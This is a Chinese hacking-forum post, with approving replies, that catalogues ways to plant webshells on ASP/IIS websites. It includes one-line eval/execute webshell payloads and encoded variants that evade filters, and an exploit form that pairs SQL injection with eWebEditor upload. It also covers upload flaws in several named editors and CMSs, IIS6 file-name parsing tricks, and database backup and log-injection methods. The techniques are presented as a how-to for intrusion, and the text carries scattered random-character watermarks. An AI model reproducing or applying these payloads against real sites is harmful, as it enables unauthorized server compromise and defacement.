返回列表 发帖

[原创文章] asp拿shell

1.有备份,上传图片备份。如不能修改文件后缀名,可备份成1.asp/1.mdb或1.asa/1.mdb的形式. c  |( h5 d+ n0 A" q9 U2 B6 a

, I0 n2 J8 w6 H2.写入配置文件一句话木马,如果过滤了<,%,>,(,)可尝试&#60;&#37;eval request&#40;&#34;value&#34;&#41;&#37;&#62;来突破,例如config.asp0 M, U3 J# _- U. o' W: q$ [
! j2 C8 a) p1 t3 i9 Y9 G  b: I7 W3 D
3.上传漏洞:
- S4 v& P- q* H1 c
* ~+ p; t+ W; g* S动网上传漏洞:抓包nc提交,其中路径可改为zjq.asp 的形式,空格替换成0x00
, R/ @: U- [, z1 z
. n5 Z" E. p* F* a逻辑上传漏洞:同时上传两个文件,第一个为正常文件,第二个为iis可解析后缀文件5 H: l/ y3 W( u9 }' O
1 w- q  O0 v3 I: d# B
雷池上传漏洞:http://localhost/leichinews/admin/uploadPic.asp?actionType=mod&picName=test.asp
' j0 P0 D; x/ G4 Q- |- a然后在上传文件里面填要传的图片格式的ASP木马; H( j# G( ?5 I" @( ^* X
就可以在uppic目录下上传文件名为test.asp的文件uppic/test.asp0 V! E) ?9 _( }) _
4.ewebeditor:有后台添加asa或aaspsp上传类型,前提要进入后台。没后台如2.16版本可利用如下代码上传
+ Y9 w$ I# b6 J) }# h" x) T* ?# Z+ n5 Q0 A( m
<html>+ n3 N* e* L$ F! r% S! S8 z: \/ |' h
<head>6 m  n; n& ?. Q: ~
<title>ewebeditor upload.asp上传利用</title>+ P, C+ b2 [! V" l# V4 c9 T& ?5 H6 Z
</head>3 {/ N2 C( C% [; g1 z+ y
<body>
2 J/ }! T+ U* E: ]<form action="upload.asp?action=save&type=IMAGE&style=luoye' union select S_ID,S_Name,S_Dir,S_CSS,S_UploadDir,S_Width,S_Height,S_Memo,S_IsSys,S_FileExt,S_FlashExt, [S_ImageExt]%2b'|cer',S_MediaExt,S_FileSize,S_FlashSize,S_ImageSize,S_MediaSize,S_StateFlag,S_DetectFromWord,S_InitMode,S_BaseUrl from ewebeditor_style where s_name='standard' and 'a'='a" method=post name=myform enctype="multipart/form-data">
+ N- T' w( G; C<input type=file name=uploadfile size=100><br><br>
! r1 M. ~# i( N8 \% n+ u<input type=submit value=Fuck>; Z. \& x9 ?: v. T" V
</form>' d4 H' l& E2 T0 w3 F: H
</body>0 q3 g5 G" ~5 D/ a7 C; ~2 J
</form>  N6 s2 f& }: y3 d7 O& l
</html>
; O6 u* O& \* L6 ^8 m% p: G: I" @* o6 s  C3 T  i# m. \8 p9 |, Z
2.8般亦可以利用admin_uploadfile.asp?id=14&dir=..列目录,前提是此文件可访问,或cookie欺骗后可访问+ ~+ i$ @! F5 x  L" l
5.fckeditor:/FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/asp/connector.asp( Y( D5 v- b# A' s7 Y
/ y* {6 R/ @4 t* u4 V8 |
利用windows2003解析。建立zjq.asp的文件夹
. w; X4 k# c9 Y% T: I8 O+ F; L$ g) [3 `6 I# b
6.southidceditor:admin/SouthidcEditor/Admin_Style.asp?action=styleset&id=47。修改上传类型$ W' r1 j  T7 s

) M* {4 |; y; m0 J$ ?7.cuteeditor:类似ewebeditor
1 v" g/ Q" w$ \: `3 U0 w& g' }5 H5 Q6 f6 }0 ?2 ]
8.htmleditor:同上
, |0 ^0 _' T  \% ~7 k! o! P1 S, Y. T& Y% [  o+ E3 o( Z, n2 j; p
9.插数据库一句话。前提是知道数据库路径,为asp,asa等后缀,无防下载表,有防下载表可尝试插入以下语句突破% x0 {/ K* }, X/ l

( L$ A! f" r: V7 D; J/ F<%execute request("value")%><%'<% loop <%:%>, W: o4 S9 r7 S
" {9 [% L! \0 }
<%'<% loop <%:%><%execute request("value")%>
+ R, s/ H! v( x5 Y4 h
9 ^) p2 M& t8 y1 h% x<%execute request("value")'<% loop <%:%>
3 l1 l" E4 t. g5 C8 ?9.查看cookie,看上传路径是否为cookie记录,可修改为*.asp的形式,利用2003解析漏洞( D& X- i( l" s2 q/ ~+ P
- e* }, U9 u/ Q& x8 A
10.上传不重命名文件,可上传zjq.asp;zjq.jpg的文件,iis6.0解析漏洞; h1 V# I$ c5 S$ w+ {1 y" v% ]

7 C9 k: k! Z+ R7 \11.注册用户名为zjq.asp,前提是网站会根据用户名新建一个以用户名命名的文件夹,上传正常图片木马,利用2k3
+ p% d: t6 O# v3 L+ L
: J5 z: c" y% k( ^0 s/ W解析漏洞得到webshell
; A1 _: m3 l3 w5 M0 A0 p& X6 D
3 L$ L9 d! L1 n: ~12.mssql差异备份,日志备份,前提需知道web路径
( @! p. S$ P4 c8 ]$ ^4 M! Q1 l3 ~
) W2 X9 T' S: b13.先备份数据库(拿到shell便于恢复网站访问),上传图片shell,数据库为asp,asa等后缀,恢复数据库填写图片路径,速度要快,因为恢复完网站就不能正常访问,一句话连接得webshell
  l1 ~* c# o  l* M  e% g0 H+ ~+ D
14.添加上传类型php,并上传phpshell,前提服务器能解析php,例如dvbbs8.2后台拿shell! o$ h' H) Z+ u

6 X6 r3 B% F; h, ?1 d15.有些系统用的是防注入程序,数据库默认为sqlin.asp,我们可以www.xx.com/*.asp?id=1'<script language=VBScript runat=server>execute(request("zjq"))</Script>,这样就会在sqlin.asp中写入一句话shell,连接即可
& _. x" C1 @! _6 p- p6 v- t2 Q3 |6 _
以上只是本人的一些拙见,并不完善,以后想到了再继续添加
( m, }4 s% l0 V/ Y不是我原创。我的朋友,飞鸟游鱼原创的
2

评分人数

  • 1335csy

  • 超超

好东西能分享 谢谢!!!

TOP

kankankankan
1

TOP

写的很不错

TOP

1# yyw258520
2 F) p5 r/ O- d* f: e) c- Y; }
  V0 `9 m/ k& R5 I1 H1 g- P# B( Q
很好啊、基本的入侵方法都包含了
6 e, _# e' w) S( P/ y
9 s; Q0 @) W$ z最好来个提权的帖子再。
" J3 t# ~- p' x+ Y+ }6 F* \9 R3 G2 C/ r
不要网上百度的。

TOP

提权才是王道。

TOP

不错哦 呵呵 学习了

TOP

谢谢楼主分享技术。。。

TOP

返回列表